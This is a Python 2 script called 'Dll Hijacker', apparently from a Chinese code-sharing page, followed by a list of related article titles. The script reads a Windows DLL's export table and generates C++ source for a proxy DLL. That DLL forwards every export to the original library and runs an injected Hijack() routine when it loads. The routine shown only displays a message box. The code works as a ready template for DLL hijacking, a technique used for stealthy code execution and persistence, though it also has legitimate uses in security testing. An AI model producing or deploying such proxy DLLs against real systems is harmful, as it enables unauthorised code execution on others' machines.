#coding=utf-8

#

# Dll Hijacker

#

# platform: Python 2.x @ Windows

#

# author:Coca1ne

import os,sys,time

import pefile

def main():

    try:

        pe = pefile.PE(sys.argv[1])

        exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols

        print "[!]Find export function :[ %d ]\r\n" % len(exportTable)

        for exptab in exportTable:

            print "%3s %10s" % (exptab.ordinal, exptab.name)

        print "\r\n[+] generating DLL Hijack cpp file ..."

        generate(exportTable)

        print "\r\n[+] generating DLL Hijack cpp file has finished!"

    except Exception, e:

        print e

def generate(exportTable):

    segments = r"//Generate by DLLHijacker.py\

\

#include <Windows.h>\

\

DEFINE_DLL_EXPORT_FUNC\

#define EXTERNC extern \"C\"\

#define NAKED __declspec(naked)\

#define EXPORT __declspec(dllexport)\

#define ALCPP EXPORT NAKED\

#define ALSTD EXTERNC EXPORT NAKED void __stdcall\

#define ALCFAST EXTERNC EXPORT NAKED void __fastcall\

#define ALCDECL EXTERNC NAKED void __cdecl\

\

namespace DLLHijacker\

{\

    HMODULE m_hModule = NULL;\

    DWORD m_dwReturn[17] = {0};\

    inline BOOL WINAPI Load()\

    {\

        TCHAR tzPath[MAX_PATH];\

        lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\"));\

        m_hModule = LoadLibrary(tzPath);\

        if (m_hModule == NULL)\

            return FALSE;\

        return (m_hModule != NULL);\

    }\

    inline VOID WINAPI Free()\

    {\

        if (m_hModule)\

            FreeLibrary(m_hModule);\

    }\

    FARPROC WINAPI GetAddress(PCSTR pszProcName)\

    {\

        FARPROC fpAddress;\

        CHAR szProcName[16];\

        fpAddress = GetProcAddress(m_hModule, pszProcName);\

        if (fpAddress == NULL)\

        {\

            if (HIWORD(pszProcName) == 0)\

            {\

                wsprintf(szProcName, \"%d\", pszProcName);\

                pszProcName = szProcName;\

            }\

            ExitProcess(-2);\

        }\

        return fpAddress;\

    }\

}\

using namespace DLLHijacker;\

VOID Hijack()\

{\

    MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);\

}\

BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)\

{\

    if (dwReason == DLL_PROCESS_ATTACH)\

    {\

        DisableThreadLibraryCalls(hModule);\

        if(Load())\

            Hijack();\

    }\

    else if (dwReason == DLL_PROCESS_DETACH)\

    {\

        Free();\

    }\

    return TRUE;\

}\

"

    filename = sys.argv[1][sys.argv[1].rindex('\\')+1:sys.argv[1].rindex('.')]

    fp = open(filename + ".cpp", "w+")

    define_dll_exp_func = ""

    for exptable in exportTable:

        define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name) +\

                            "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"\")\n"

    segments = segments.replace('DLL_FILENAME', filename)

    segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\\','')

    fp.writelines(segments)

    forward_dll_exp_func = ""

    for exptable in exportTable:

        forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)\n{" + \

                            "\n        __asm POP m_dwReturn[0 * TYPE long];\n    GetAddress(\""+ \

                            str(exptable.name) + "\")();\n    __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n"

    fp.writelines(forward_dll_exp_func)

    fp.close()

def usage():

    print "Usage:"

    print "    %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0]

if __name__ == "__main__":

    if(len(sys.argv) <2):

        usage()

    else:

        main()

Dll Hijacker的更多相关文章

  1. 使用powershell提权的一些技巧

    原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html http ...

  2. metasploit--exploit模块信息

    Name                                             Disclosure Date  Rank    Description ----           ...

  3. Kali linux 2016.2(Rolling)中的Exploits模块详解

    简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序. root@kali:~# msfconsole Unable to handle kernel NULL pointer der ...

  4. dll文件32位64位检测工具以及Windows文件夹SysWow64的坑

    自从操作系统升级到64位以后,就要不断的需要面对32位.64位的问题.相信有很多人并不是很清楚32位程序与64位程序的区别,以及Program Files (x86),Program Files的区别 ...

  5. C#创建dll类库

    类库让我们的代码可复用,我们只需要在类库中声明变量一次,就能在接下来的过程中无数次地使用,而无需在每次使用前都要声明它.这样一来,就节省了我们的内存空间.而想要在类库添加什么类,还需取决于类库要实现哪 ...

  6. 关于Linux和Windows下部署mysql.data.dll的注册问题

    mysql ado.net connector下载地址: http://dev.mysql.com/downloads/connector/net/ 选择版本: Generally Available ...

  7. Windows平台Go调用DLL的坑

    最近的项目中,使用了GO来开发一些服务中转程序.业务比较简单,但是有一些业务需要复用原有C++开发的代码.而在WINDOWS,用CGO方式来集成C/C++代码并不是太方便.所以用DLL把C++的代码封 ...

  8. C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁

    系列文章 C#开发奇技淫巧一:调试windows系统服务 C#开发奇技淫巧二:根据dll文件加载C++或者Delphi插件 C#开发奇技淫巧三:把dll放在不同的目录让你的程序更整洁 程序目录的整理 ...

  9. .Net使用Newtonsoft.Json.dll(JSON.NET)对象序列化成json、反序列化json示例教程

    JSON作为一种轻量级的数据交换格式,简单灵活,被很多系统用来数据交互,作为一名.NET开发人员,JSON.NET无疑是最好的序列化框架,支持XML和JSON序列化,高性能,免费开源,支持LINQ查询 ...

随机推荐

  1. Hbase­优化方案

    1.预分区设计 真正存储数据的是region要维护一个区间段的rowkey startRow~endRowkey ->手动设置预分区 create 'user_p','info','partit ...

  2. LeetCode—Minimum Size Subarray Sum

    题目: Given an array of n positive integers and a positive integer s, find the minimal length of a sub ...

  3. nginx 哈希表结构图

  4. 爬虫之FileCookieJar

    简介 虽然CookieJar模块能够做到给请求设置cookie,但是它的cookie是保存在内存里的,每次用都需要重新设置, 这就衍生了一个它的子类---FileCookieJar,它可以将cooki ...

  5. SSO详解(转)

    转自:http://www.cnblogs.com/EzrealLiu/p/5559255.html 1. 摘要 SSO这一概念由来已久,网络上对应不同场景的成熟SSO解决方案比比皆是,从简单到复杂, ...

  6. centos7 设置mongodb远程连接

    /etc/mongod.conf 更改 bindIp: 127.0.0.1 为 bindIp: 0.0.0.0

  7. vue简单demo

    为了学习基础语法,我并没有用vue-cli脚手架来vue init [基于什么类型]  [项目名称]初始化项目,而是直接<script>../vue.js</script> & ...

  8. css-1,css的三种引入方式 基本选择器

    <!-- (1)CSS 层叠样式表 作用:修饰网页结构 (2)css的三种引入方式 权重: 优先级高 权重大 谁在页面谁的权重大 - 行内样式 注意:行内样式的优先级是最高的 - 内接样式 - ...

  9. iClap分享:如何优雅的在 APP 中实现测试?

    开发团队常面临的问题有:内测 APP 时测出一堆 bug 写了很多文档,交到下一个人手中时问题总是不够清晰明了;版本发布公测时只能分发原生版本给团队和用户,无法快速反馈测试和体验结果;使用第三方工具, ...

  10. Tasks in parallel

    using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.We ...